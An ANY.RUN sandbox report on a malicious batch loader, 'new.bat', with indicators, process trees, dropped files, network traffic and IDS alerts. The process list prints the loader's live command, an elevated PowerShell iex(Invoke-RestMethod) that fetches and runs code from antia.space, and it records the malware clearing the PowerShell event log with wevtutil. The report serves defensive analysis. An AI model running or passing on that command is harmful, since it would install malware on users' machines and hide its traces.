File name:

new.bat

Full analysis: https://app.any.run/tasks/84a1ec87-93b0-48f8-a27e-25aff7c525b0
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: April 06, 2026, 16:46:50
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
loader
powershell
susp-powershell
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text, with CRLF line terminators
MD5:

456D029DEB1E82DF95CADF730B24917D

SHA1:

0DEC5C9D79EF99A03E9750B46560EE2B2E67A48C

SHA256:

B45DB83F8EC065535E7E50F7EE0F0D88B70524DCDB7EF326D4E7C0CAFC68B151

SSDEEP:

6:hyJs0MFnIk/FS3S2ijPeanSTd3fILVfGGb:UJFMRIk/FS3S2imh8VfZ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Loader pattern has been found

      • powershell.exe (PID: 1068)
      • powershell.exe (PID: 8040)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 8040)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 7256)

    • Starts process via Powershell

      • powershell.exe (PID: 1068)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 7256)
      • powershell.exe (PID: 1068)
      • powershell.exe (PID: 8040)

    • Application launched itself

      • powershell.exe (PID: 1068)
      • powershell.exe (PID: 8040)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 8040)

    • Checks a user's role membership (POWERSHELL)

      • powershell.exe (PID: 8040)

    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 8100)
      • csc.exe (PID: 8264)

    • Executable content was dropped or overwritten

      • csc.exe (PID: 8100)
      • powershell.exe (PID: 8040)
      • csc.exe (PID: 8264)

    • Uses WEVTUTIL.EXE to cleanup log

      • powershell.exe (PID: 8040)

  • INFO

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 8040)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 8040)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 8040)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 8040)

    • Checks supported languages

      • csc.exe (PID: 8100)
      • cvtres.exe (PID: 9028)
      • csc.exe (PID: 8264)
      • cvtres.exe (PID: 6848)

    • Reads the machine GUID from the registry

      • csc.exe (PID: 8100)
      • csc.exe (PID: 8264)

    • Create files in a temporary directory

      • csc.exe (PID: 8100)
      • cvtres.exe (PID: 9028)
      • cvtres.exe (PID: 6848)
      • csc.exe (PID: 8264)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
163
Monitored processes
17
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe conhost.exe no specs csc.exe cvtres.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs winmgmt.exe no specs slui.exe no specs csc.exe cvtres.exe no specs wevtutil.exe no specs conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
792\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exewevtutil.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1068PowerShell -Command "Start-Process PowerShell -Verb RunAs -ArgumentList '-Command [System.Net.ServicePointManager]::SecurityProtocol = 3072; iex (Invoke-RestMethod https://antia.space/majestic)'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
1840\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3168\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3240C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
3584"powershell.exe" winmgmt /verifyrepositoryC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3796"powershell.exe" Get-Service -Name winmgmt | Select-Object -ExpandProperty StatusC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
4292\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5548\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5996"C:\Windows\System32\wevtutil.exe" cl "Microsoft-Windows-PowerShell/Operational"C:\Windows\System32\wevtutil.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Eventing Command Line Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wevtutil.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\combase.dll
c:\windows\system32\sechost.dll
Total events
23 446
Read events
23 445
Write events
1
Delete events
0

Modification events

(PID) Process:(8040) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
Operation:writeName:ExecutionPolicy
Value:
Unrestricted
Executable files
13
Suspicious files
9
Text files
18
Unknown types
0

Dropped files

PID
Process
Filename
Type
8040powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3f4faeem.ekl.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8100csc.exeC:\Users\admin\AppData\Local\Temp\0rbsxgkr\0rbsxgkr.dllexecutable
MD5:8A593DC037F95E1E2985C6AF88003040
SHA256:E9DBAF674AC14FEF04D41D222D78E6925B5F944ED7F4B15ABD3DED033EE2F6E6
1068powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_nan305dq.vsv.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1068powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:E89F0DE47250FAF418F71CBC5DFE8D90
SHA256:2B13E7CFD186DB04765AB5A1517770A10865B626968510C7E03D78F4020D36AC
1068powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_njumo0mh.d4d.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8040powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A981Q12VGQU59U7V7OTD.tempbinary
MD5:1A26EAED296242DF450FE7D59CAB823E
SHA256:5E182062925D7AA40964000267D5A673EF96C9F3309C5C461151C1AF5CBB7C09
8040powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF1e5ad0.TMPbinary
MD5:00A03B286E6E0EBFF8D9C492365D5EC2
SHA256:4DBFC417D053BA6867308671F1C61F4DCAFC61F058D4044DB532DA6D3BDE3615
8040powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:1A26EAED296242DF450FE7D59CAB823E
SHA256:5E182062925D7AA40964000267D5A673EF96C9F3309C5C461151C1AF5CBB7C09
8040powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hzkxri0i.5bg.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8040powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_tcafhtia.qr2.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
43
TCP/UDP connections
22
DNS requests
16
Threats
7

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
8040
powershell.exe
GET
200
66.151.34.51:443
https://antia.space/majestic
NL
binary
73.7 Kb
malicious
356
svchost.exe
POST
200
40.126.32.136:443
https://login.live.com/RST2.srf
US
xml
1.24 Kb
whitelisted
356
svchost.exe
GET
200
23.11.41.157:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAz1vQYrVgL0erhQLCPM8GY%3D
NL
binary
471 b
whitelisted
356
svchost.exe
POST
400
40.126.32.136:443
https://login.live.com/ppsecure/deviceaddcredential.srf
US
text
203 b
whitelisted
8040
powershell.exe
GET
66.151.34.51:443
https://antia.space/majestic/OpenCvSharpExtern.dll
NL
unknown
356
svchost.exe
POST
400
40.126.32.136:443
https://login.live.com/ppsecure/deviceaddcredential.srf
US
text
203 b
whitelisted
356
svchost.exe
POST
400
40.126.32.136:443
https://login.live.com/ppsecure/deviceaddcredential.srf
US
text
203 b
whitelisted
6768
MoUsoCoreWorker.exe
GET
304
51.104.136.2:443
https://settings-win.data.microsoft.com/settings/v3.0/OneSettings/Client?OSVersionFull=10.0.19045.4046.amd64fre.vb_release.191206-1406&LocalDeviceID=s%3ABAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&FlightRing=Retail&AttrDataVer=186&OSUILocale=en-US&OSSkuId=48&App=WOSC&AppVer=&IsFlightingEnabled=0&TelemetryLevel=1&DeviceFamily=Windows.Desktop
US
whitelisted
356
svchost.exe
POST
400
40.126.32.136:443
https://login.live.com/ppsecure/deviceaddcredential.srf
US
text
203 b
whitelisted
2328
svchost.exe
GET
200
2.16.164.120:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
825 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2328
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:137
Not routed
whitelisted
7244
RUXIMICS.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
6768
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
3412
svchost.exe
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:138
Not routed
whitelisted
8040
powershell.exe
66.151.34.51:443
antia.space
HOSTKEY-AS
NL
malicious
356
svchost.exe
40.126.32.136:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
356
svchost.exe
23.11.41.157:80
ocsp.digicert.com
AKAMAI-AMS
NL
whitelisted
2328
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 20.73.194.208
whitelisted
self.events.data.microsoft.com
  • 20.42.65.88
whitelisted
google.com
  • 142.251.110.100
  • 142.251.110.102
  • 142.251.110.113
  • 142.251.110.139
  • 142.251.110.138
  • 142.251.110.101
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted
antia.space
  • 66.151.34.51
unknown
login.live.com
  • 40.126.32.136
  • 20.190.160.5
  • 40.126.32.140
  • 20.190.160.4
  • 40.126.32.76
  • 20.190.160.2
  • 40.126.32.74
  • 20.190.160.128
whitelisted
ocsp.digicert.com
  • 23.11.41.157
whitelisted
crl.microsoft.com
  • 2.16.164.120
  • 2.16.164.49
whitelisted
www.microsoft.com
  • 23.52.181.212
whitelisted
slscr.update.microsoft.com
  • 135.233.95.144
whitelisted

Threats

PID
Process
Class
Message
8040
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
8040
powershell.exe
Potentially Bad Traffic
SUSPICIOUS [ANY.RUN] Check Security.Principal.WindowsBuiltInRole has been detected
8040
powershell.exe
Misc activity
SUSPICIOUS [ANY.RUN] The Principal.WindowsIdentity in PS.Script has been detected
2328
svchost.exe
Unknown Traffic
ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
8040
powershell.exe
Potentially Bad Traffic
SUSPICIOUS [ANY.RUN] PowerShell script with IWR/IEX chain in HTTP response
8040
powershell.exe
A Network Trojan was detected
ET MALWARE Observed Spoofed WindowsPowerShell User-Agent
8040
powershell.exe
A suspicious filename was detected
ET HUNTING HTTP GET Request for newtonsoft.json.dll - Possible Infostealer Activity
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
new.bat